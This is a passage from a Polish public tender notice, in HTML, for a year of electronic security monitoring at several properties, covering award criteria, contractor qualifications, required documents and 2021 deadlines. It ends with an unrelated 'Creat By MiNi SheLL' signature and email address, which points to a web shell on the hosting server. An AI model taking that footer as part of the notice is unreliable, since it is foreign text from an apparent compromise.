Wartość części: <span class="normal"> 124783,12 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Kryterium „Cena brutto dla Przedmiotu” -60%<br/>Kryterium „Doświadczenie” (Kd) - 12%<br/>Kryterium „zatrudnienie osób wymienionych w art. 96 ust. 2 pkt. 2) lit. a, b, c, e, g” (Kz) - 16%<br/>Kryterium „dodatkowe usługi patrolu ochronno - interwencyjnego”(Ku)- 12%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium „Doświadczenie” (Kd)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">12</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium „zatrudnienie osób wymienionych w art. 96 ust. 2 pkt. 2) lit. a, b, c, e, g” (Kz)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">16</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium „dodatkowe usługi patrolu ochronno - interwencyjnego”(Ku</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">12</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> usługi społeczne ochrony całodobowej w formie monitoringu elektronicznego obiektów Idzików, Trzebieszowice, Nowa Ruda, Dzikowiec, Gorzuchów Gorzelnia, Ścinawka Średnia, Łagiewniki </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 90833,92 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Kryterium „Cena brutto dla Przedmiotu” -60%<br/>Kryterium „Doświadczenie” (Kd) - 12%<br/>Kryterium „zatrudnienie osób wymienionych w art. 96 ust. 2 pkt. 2) lit. a, b, c, e, g” (Kz) - 16%<br/>Kryterium „dodatkowe usługi patrolu ochronno - interwencyjnego”(Ku)- 12%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium „Doświadczenie” (Kd)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">12</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium „zatrudnienie osób wymienionych w art. 96 ust. 2 pkt. 2) lit. a, b, c, e, g” (Kz)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">16</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium „dodatkowe usługi patrolu ochronno - interwencyjnego”(Ku</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">12</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1 nie podlegają wykluczeniu - obligatoryjne przesłanki wykluczenia art. 108 ust. 1 ustawy PZP<br/>oraz fakultatywne przesłanki z art. 109 ust.1 pkt 4)-10) ustawy PZP oraz<br/>2 spełniają warunki udziału w postępowaniu - dotyczące:<br/>2.1 zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie stawia szczególnych wymagań w tym zakresie;<br/>2.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile to<br/>wynika z odrębnych przepisów<br/>Zamawiający wymaga posiadania koncesji do wykonywania działalności w zakresie usług<br/>ochrony osób i mienia realizowanej w formie bezpośredniej ochrony fizycznej:<br/>a) stałej lub doraźnej,<br/>b) polegającej na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w<br/>elek-tronicznych urządzeniach i systemach alarmowych, zgodnie z ustawą z dnia 22 sierpnia1997 roku o ochronie osób i mienia.<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej<br/>Wykonawców warunek zostanie uznany za spełniony, jeżeli każdy z wykonawców wykaże się<br/>posiadaniem koncesji. Zamawiający nie uzna warunku za spełniony, jeżeli którykolwiek z<br/>uczestników nie wykaże się wymaganą koncesją.<br/>2.3 sytuacji ekonomicznej lub finansowej<br/>Zamawiający wymaga posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie<br/>prowa-dzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę<br/>gwarancyjną nie mniejszą niż 2 000 000 PLN (słownie: dwa milion złotych).<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej<br/>Wykonawców warunek zostanie uznany za spełniony, jeżeli jeden z wykonawców spełni<br/>warunek samodzielnie. Zamawiający nie uzna warunku za spełniony, jeżeli wszyscy uczestnicy<br/>w sumie wykażą się wymaganym ubezpieczeniem, ale żaden z nich indywidualnie nie wykaże<br/>się całym wymaganym ubezpieczeniem.<br/>2.4 zdolności technicznej lub zawodowej<br/>Niniejszy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że: w okresie<br/>ostatnich trzech lat licząc wstecz od dnia w którym upływa termin składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie) wykonywał, a w przypadku świadczeń<br/>ciągłych wykonuje co najmniej 3 usługi elektronicznego systemu monitoringu całodobowego<br/>ochrony osób i mienia w obiektach zabudowanych realizowanych w sposób ciągły przez okres<br/>nie krótszy niż 12 miesięcy.<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej<br/>Wykonawców warunek zostanie uznany za spełniony, jeżeli jeden z wykonawców wykaże się<br/>całym wymaganym doświadczeniem. Zamawiający nie uzna warunku za spełniony, jeżeli<br/>wszyscy uczestnicy w sumie wykażą się wymaganym doświadczeniem, ale żaden z nich<br/>indywidualnie nie wykaże się całym wymaganym doświadczeniem.<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z<br/>innymi wykonawcami, wykaz usług dotyczy usług, w których wykonaniu wykonawca ten<br/>bezpośrednio uczestniczył.<br/>3 Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej<br/>podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi<br/>stosunków.<br/>4 W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia<br/>wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby,<br/>jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane.5 Zasady udostępniania zasobów opisano w ust. 13 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">A. DOKUMENTY SKŁADANE DO UPŁYWU TERMINU SKŁADANIA<br/>OFERT<br/>1 oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu -<br/>zgodne co do treści z Zał.nr 2 do SWZ; W przypadku wspólnego ubiegania się o zamówienie przez<br/>wykonawców, oświadczenie składa każdy z wykonawców.<br/>2 Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa,<br/>wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy<br/>3 Podmiot udostępniający zasoby składa również oświadczenie o niepodleganiu wykluczeniu i<br/>spełnianiu warunków udziału w postępowaniu zgodne z załącznikiem nr 2a do SWZ. W oświadczeniu<br/>podmiot udostepniający zasoby wskazuje, które warunki udziału w postępowaniu spełnia.<br/>B. DOKUMENTY (PODMIOTOWE ŚRODKI DOWODOWE) SKŁADANE PO OTWARCIU OFERT<br/>1 odpis lub informacji z KRS lub CEDIG, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji;<br/>2 koncesja do wykonywania działalności w zakresie usług ochrony osób i mienia realizowanej w formie<br/>bezpośredniej ochrony fizycznej:a) stałej lub doraźnej,<br/>b) polegającej na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w<br/>elektronicznych urządzeniach i systemach alarmowych, zgodnie z ustawą z dnia 22 sierpnia 1997 roku<br/>o ochronie osób i mienia.<br/>3 dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie<br/>mniejszą niż 2 000 000 PLN (dwa miliony złotych).<br/>4 wykaz usług wykonanych, a w przypadku świadczeń ciągłych również wykonywanych, w okresie<br/>ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały<br/>wykonane lub są wykonywane (Wykaz usług winien być zgodny co do treści z załącznikiem nr 3 do<br/>SWZ) oraz dowodów określających, czy usługi zostały wykonane lub są wykonywane należycie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">A. DOKUMENTY SKŁADANE DO UPŁYWU TERMINU SKŁADANIA OFERT<br/>1 oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu -<br/>zgodne co do treści z Zał.nr 2 do SWZ;<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z<br/>wykonawców.<br/>2 Podmiot udostępniający zasoby składa również oświadczenie o niepodleganiu wykluczeniu i<br/>spełnianiu warunków udziału w postępowaniu zgodne z załącznikiem nr 2a do SWZ.B. DOKUMENTY (PODMIOTOWE ŚRODKI DOWODOWE) SKŁADANE PO OTWARCIU OFERT<br/>1 odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>W przypadku oferty wspólnej odpis lub informację składa każdy z Wykonawców.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, podmiotowe środki<br/>dowodowe, o których mowa w sekcji B pkt. 12.5.1 SWZ składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie. Zamawiający żąda od Wykonawcy, który polega na zdolnościach lub<br/>sytuacji podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp,<br/>przedstawienia podmiotowych środków dowodowych, o których mowa w pkt. 12.5.1 SWZ, dotyczących<br/>tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z<br/>postępowania.<br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast:<br/>- odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, o których mowa w ust. 12.5.1) SWZ – składa dokument lub dokumenty<br/>wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające<br/>odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza<br/>likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona<br/>ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w<br/>przepisach miejsca wszczęcia tej procedury – wystawionej nie wcześniej niż 3 miesiące przed ich<br/>złożeniem.<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa wyżej, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków,<br/>o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b oraz pkt 3 ustawy PZP,<br/>zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio<br/>oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego re-prezentacji, lub<br/>oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w<br/>którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod<br/>przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu<br/>zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania<br/>wykonawcy. Terminy ważności dokumentów stosuje się odpowiednio jak wyżej.<br/>2 Na wezwanie zamawiającego wykonawca, który polega na zdolnościach innych lub sytuacji innych<br/>podmiotów na zasadach określonych w art. 118 ustawy PZP (udostępnienie zasobów), zobowiązany<br/>jest do przedstawienia w odniesieniu do tych podmiotów dokumentów na potwierdzenie braku podstaw<br/>do wykluczenia, tj. oświadczenia o niepodleganiu wykluczeniu - zgodnego co do treści z Załącznikiem<br/>nr 2a do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> DOKUMENTY SKŁADANE DO UPŁYWU TERMINU SKŁADANIA OFERT<br/>PRZEDMIOTOWE ŚRODKI DOWODOWE<br/>1 Do oferty, wykonawca dołącza przedmiotowe środki dowodowe służące do oceny oferty<br/>zgodnie z kryteriami oceny ofert wskazanymi w pkt. 19 SWZ:<br/>2 wykaz wykonanych usług wraz z dokumentami potwierdzającymi należyte wykonanie usług<br/>wymienionych w wykazie – dotyczące usług w zakresie wymaganym wskazanym w pkt. 11.2.4<br/>SWZ oraz usług dodatkowego doświadczenia zawodowego podlegającego ocenie w kryterium<br/>określonym w pkt. 19.3 SWZ – wzór załącznik nr 3 do SWZ;<br/>3 oświadczenie o zatrudnieniu przy realizacji umowy na pełny etat, na okres trwania umowy<br/>pracowników z pośród osób wymienionych w art. 96 ust. 2 pkt. 2) lit. a, b, c, e, g to jest osób:<br/>-bezrobotnych w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i<br/>instytucjach rynku pracy,<br/>-poszukujących pracy, niepozostających w zatrudnieniu lub niewykonujących innej pracy<br/>zarobkowej, w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i<br/>instytucjach rynku pracy,<br/>-usamodzielnianych, o których mowa w art. 140 ust. 1 i 2 ustawy z dnia 9 czerwca 2011 r. o<br/>wspieraniu rodziny i systemie pieczy zastępczej,<br/>-niepełnosprawnych w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i<br/>społecznej oraz zatrudnianiu osób niepełnosprawnych<br/>-do 30. roku życia oraz po ukończeniu 50. roku życia, posiadających status oso-by poszukującej<br/>pracy, bez zatrudnienia<br/>Wzór oświadczenia przedstawiono w załączniku nr 4 do SWZ<br/>4 oświadczenie w zakresie dodatkowych niespodziewanych wizyt lustracyjnych na obiektach<br/>objętych przedmiotem zamówienia. Wzór oświadczenia przedstawiono w załączniku nr 4 do<br/>SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wspólne ubieganie się o zamówienie<br/>14.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (min. konsorcjum, spółkacywilna). Wykonawcy ponoszą solidarną odpowiedzialność.<br/>14.2 Wykonawcy występujący wspólnie zobowiązani są do ustanowienia pełnomocnika do<br/>repre-zentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja<br/>będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem wykonawców<br/>działających wspólnie.<br/>14.3 Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegają-cych się o udzielenie zamówienia.<br/>14.4 Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana postanowień umowy jest dopuszczalna w sytuacjach przewidzianych w art. 455 PZP.<br/>Dopuszczalna jest również zmiana terminu realizacji przedmiotu umowy z powodu:<br/>1) Okoliczności uniemożliwiających lub znacznie utrudniających realizację wszystkich lub części<br/>usług objętych umową, jeśli okoliczności te mają charakter obiektywny oraz niezależny od woli<br/>Stron;<br/>2) Przyczyn leżących wyłącznie po stronie Zamawiającego, których nie dało się wcześniej<br/>przewidzieć;<br/>2. Dopuszczalna jest również zmiana przysługującego Wykonawcy wynagrodzenia, w przypadku<br/>zmiany stawki podatku VAT w okresie trwania umowy. W takiej sytuacji, należne Wykonawcy<br/>wynagrodzenie netto pozostanie niezmienne, zaś podwyższeniu podlegać będzie jedynie kwota<br/>odpowiadająca aktualnej stawce podatku VAT.<br/>4. W przypadku wystąpienia zmian dot. zatrudnienia osób na umowę o pracę Wykonawca ma<br/>obowiązek w terminie do 7 dni od ich zaistnienia zgłosić pisemnie na adres wskazany w<br/>komparycji lub drogą mailową na adres wskazany w §6 ust. 1 umowy, każdą zmianę<br/>Zamawiającemu. Wykonawca zobowiązany jest do przekazania Zamawiającemu nowego<br/>wykazu osób zatrudnionych przy realizacji zamówienia na podstawie umowy o pracę wraz ze<br/>wskazaniem czynności jakie będą oni wykonywać oraz kopie dokumentów potwierdzające<br/>zatrudnienie osób na umowę o pracę przy realizacji zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-30 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-30 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W przedmiocie 1 obiekt 10 i 11 termin wykonania zamówienia od 7 października 2021 do 6<br/>października 2022

Creat By MiNi SheLL
Email: jattceo@gmail.com